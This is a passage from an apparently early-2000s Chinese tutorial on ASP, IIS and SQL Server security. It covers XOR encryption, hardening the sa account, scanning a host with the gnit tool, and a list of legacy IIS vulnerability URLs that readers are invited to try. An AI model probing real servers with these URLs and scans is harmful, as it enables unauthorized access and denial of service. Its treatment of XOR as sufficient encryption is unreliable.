截取和我们需要加密的明文同样长度的密钥。然后使用一个简单的异或操作
将明文和密钥进行运算,那么得到的结果就是加密后的密文了。过程很简单的。
由于是使用了异或操作,所以解密将非常简单,只要使用同样的密钥对密文
再次进行异或操作就能够解密了。
在上面介绍的基础上,你可以少加改动,就可以使用同样的方法加密一个文件。
唯一需要注意的是,对于一个二进制文件,你需要做一些完整性检查以保证转换回来
的字符不要越界。
现在你需要做的就是把密钥保存在服务器上的一个安全的地方(不能够被外部访问)
15 sql server的安全性
目前用asp编写的web应用中,后台数据库大部分sql server。sql server相对来说比较安全。但是也要小心地配置sql server.
1安装远程数据库管理有风险
sql server支持从远程进行数据库的维护。在安装时你可以选择不安装,安装完成以后,你还可以通过“sql server network utility”来删除远程管理。如果你要使用远程管理,请使用tcp/ip,并将缺省的端口1433改变为其他的数值。使用远程对你可能比较方便,便是请注意一个hacker只要知道你的sql server密码,就可以进入你的数据库。
2 改变sa的密码。
缺省安装时,sql server的sa账号的密码为空,建议你在enterprise server中,改变sa的密码。
3 数据库登录账号不要写入asp页面中。
16 使用最新的扫描器扫描asp漏洞
目前可以扫描iis漏洞的扫描器有很多,比较有名的有iss,cis和gnit等。下面我们以gnit为例子。
gnit是个功能很强的漏洞扫描器,能扫描nt的用户名和相关信息列表,扫描iis的漏洞。
在winnt的dos模式下打下:
gnit <对方ip>
比如:gnit 172.1.1.1
gnit开始扫描端口,从上图可知目标主机提供了http,ftp,smtp等服务,扫描完后。会在gnit目录下生成一个html文件,其文件名是目标主机的ip。打开这个html文件,会看到对方主机的一些信息和漏洞。这些信息和漏洞包括:用户名和组的相关详细信息,开放的服务和web扫描的漏洞等。我们比较关心的是web扫描的漏洞信息:
下图是gnit的web扫描一些信息,其中加粗部分是漏洞,当然有些漏洞并不准确,但不妨试试。(有必要说明下,以下我是在一台nt4。01,iis4。0,option pack6.0,并且缺省安装)
要测试这些漏洞很简单。比如:可在url输入:
http://someurl/iisadmpwd/aexp3.htr
───可远程管理iis。
http://someurl/scripts/iisadmin/bdir.htr
────目标主机的硬盘全部目录都一览无余,并且有创建新目录的功能(不过我在测试中,并不能创建远程目录,但是能使目标主机的web当机)
http://someurl/scripts/tools/getdrvrs.exe
----可在远程主机上创建odbc数据库,不管数据库路径和数据库是否存在。
此外还有其它的漏洞,请网友自己测试。其解决方法请看上面的漏洞分析。
如果用cis扫描器,还有比较详细的漏洞分析和解决方法。请读者自己分析。
七、总结
目前web数据库访问的多种技术中,比如cgi(通用网关接口)、jdbc、php、asp,asp以其开发周期短,存取方式数据库简单,运行速度快而成为众多网站程序员的首选开发技术。
但是其网络安全性也是不容忽视的。做为一个asp开发者,你必须关注nt和iis的安全漏洞,从上面的讨论我们可以看到asp的很多漏洞都是由iis所引起的。同时asp程序员在开发自己的网站时,要注意来自asp程序设计不当所引发的安全问题。
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://http://www.zjjv.com//
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!